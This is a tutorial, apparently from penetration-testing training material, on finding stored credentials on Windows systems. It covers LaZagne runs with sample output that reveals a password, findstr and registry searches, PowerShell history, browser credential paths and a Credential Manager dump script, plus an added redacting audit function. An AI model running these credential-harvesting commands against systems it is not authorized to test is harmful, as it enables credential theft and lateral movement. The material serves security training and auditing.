# Credential Hunting in Windows
Credential hunting in Windows environments can yield valuable access that allows for privilege escalation or lateral movement. This process involves searching for plain-text credentials in files, database files, config files, saved credentials, CLI history, and more.
## Understanding the Target

Before diving into credential hunting, consider what an IT administrator might be doing on a day-to-day basis and which tasks require credentials:

- Domain administration
- Database management
- Service configuration
- Scheduled task creation
- Remote administration
- Script automation
## Key Search Terms

Whether using GUI or CLI tools, knowing what to search for is critical:

- Passwords
- Passphrases
- Keys
- Username
- User account
- Creds
- Users
- Passkeys
- configuration
- dbcredential
- dbpassword
- pwd
- Login
- Credentials
## Using LaZagne

LaZagne is a powerful tool for extracting stored credentials from numerous applications.

```
C:\Users\bob\Desktop> start lazagne.exe all
```

This executes LaZagne and runs all included modules. Add the `-vv` option to see detailed background operations.

### LaZagne Output Example

```
|====================================================================|
|                                                                    |
|                        The LaZagne Project                         |
|                                                                    |
|                          ! BANG BANG !                             |
|                                                                    |
|====================================================================|

########## User: bob ##########

------------------- Winscp passwords -----------------

[+] Password found !!!
URL: 10.129.202.51
Login: admin
Password: SteveisReallyCool123
Port: 22
```
## Using findstr

Windows' built-in `findstr` command can search for patterns across many file types. `/S` recurses into subdirectories, `/I` makes the match case-insensitive, `/M` prints only the names of files that contain a match, and `/C:` treats the argument as a literal string:

```
C:\> findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml
```
## Common Credential Storage Locations

### Configuration Files

- Web.config files
- App.config files
- ApplicationHost.config
- PHP configuration files
- XML configuration files
### Registry

```
# Search the registry for string values containing "password" (works from cmd or PowerShell)
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```
### Saved Credentials

```
cmdkey /list
```

### PowerShell History

```powershell
# Get-History only covers the current session; the PSReadLine file persists across sessions
Get-History
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
```
## Additional Hunting Locations

- Passwords in Group Policy in the SYSVOL share
- Passwords in scripts in the SYSVOL share
- Passwords in scripts on IT shares
- Passwords in web.config files on dev machines and IT shares
- unattend.xml files
- Passwords in the AD user or computer description fields
- KeePass databases
- Files such as pass.txt, passwords.docx, passwords.xlsx
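The key search terms, the `findstr` file types and the share locations above can be combined into one audit pass. The following is an added example, not code from the original page: a PowerShell function (its name, parameters and keyword list are this example's own choices) that walks the given directories, flags lines containing those terms, and reports them with the value portion redacted so the report itself does not become another plaintext credential store.

```powershell
# Added example (not from the original page). Audits the file types named in
# the findstr section for the page's key search terms and reports each hit
# with the secret portion redacted, for clean-up and remediation tracking.
function Find-PlaintextSecretExposure {
    [CmdletBinding()]
    param(
        # Directories to audit, e.g. IT shares, SYSVOL, web roots, dev machines
        [Parameter(Mandatory)] [string[]] $Path,
        # File types taken from the findstr example, plus common script types
        [string[]] $Include = @('*.txt','*.ini','*.cfg','*.config','*.xml',
                                '*.ps1','*.yml','*.bat','*.vbs'),
        # Keywords from this page's search-term list (noisy ones like
        # "users" and "login" left out); "cpassword" is the attribute used
        # by Group Policy Preferences XML in SYSVOL
        [string[]] $Keyword = @('password','passwd','pwd','passphrase','passkey',
                                'dbpassword','dbcredential','credential','creds',
                                'cpassword')
    )
    # Build one case-insensitive alternation, e.g. (?i)(password|pwd|...)
    $escaped = $Keyword | ForEach-Object { [regex]::Escape($_) }
    $pattern = '(?i)(' + ($escaped -join '|') + ')'

    Get-ChildItem -Path $Path -Include $Include -Recurse -File -ErrorAction SilentlyContinue |
        Select-String -Pattern $pattern -AllMatches |
        ForEach-Object {
            # Conservative redaction: drop everything after the first "=" or ":"
            # on the line so no secret value lands in the audit output
            $redacted = $_.Line -replace '(?<=[=:]\s*)\S.*$', '<REDACTED>'
            [pscustomobject]@{
                File    = $_.Path
                Line    = $_.LineNumber
                Keyword = ($_.Matches | Select-Object -First 1).Value
                Context = $redacted.Trim()
            }
        }
}

# Usage (paths are placeholders):
# Find-PlaintextSecretExposure -Path '\\dc01\SYSVOL','C:\inetpub\wwwroot' | Format-Table -AutoSize
```

Run it from an account that can read the shares in question; each row points at a file and line to clean up (move the secret to a vault, a gMSA or DPAPI-protected storage) without the report reproducing the secret.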
## Browser Stored Credentials

Modern browsers store credentials that can be extracted. The stored passwords are encrypted with DPAPI keyed to the logged-on user, so extraction has to run in that user's context:

Chrome:

```
%LocalAppData%\Google\Chrome\User Data\Default\Login Data
```

Firefox:

```
%AppData%\Mozilla\Firefox\Profiles\[profile]\logins.json
```

Edge:

```
%LocalAppData%\Microsoft\Edge\User Data\Default\Login Data
```

Tools such as LaZagne can extract these with the appropriate module:

```
C:\> lazagne.exe browsers
```
## Service Account Credentials

Services often run with stored credentials. The query below lists services whose logon account is neither LocalSystem nor one of the built-in NT AUTHORITY / NT SERVICE accounts:

```powershell
# Get-CimInstance -ClassName Win32_Service is the modern equivalent of Get-WmiObject
Get-WmiObject -Class Win32_Service | Where-Object {$_.StartName -notlike "LocalSystem" -and $_.StartName -notlike "NT AUTHORITY\*" -and $_.StartName -notlike "NT SERVICE\*"} | Select-Object Name, StartName, State
```
## Credential Manager

Windows Credential Manager stores various login credentials:

```powershell
# PowerShell script to access Credential Manager via the WinRT PasswordVault API
# (this API exposes the "Web Credentials" section of Credential Manager, not Windows Credentials)
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
# RetrievePassword() populates the Password property of each entry before it is output
$vault.RetrieveAll() | % { $_.RetrievePassword(); $_ }
```
## Best Practices for Credential Hunting

- **Be systematic:** Create a checklist of locations to examine
- **Document findings:** Record all credentials and their sources
- **Prioritize high-value targets:** Focus on administrative and service accounts
- **Consider timing:** Some credentials may be exposed only during specific operations
- **Look for patterns:** Users often reuse passwords with slight variations
By thoroughly exploring these common storage locations, you can often find credentials that provide increased access and privileges within a Windows environment.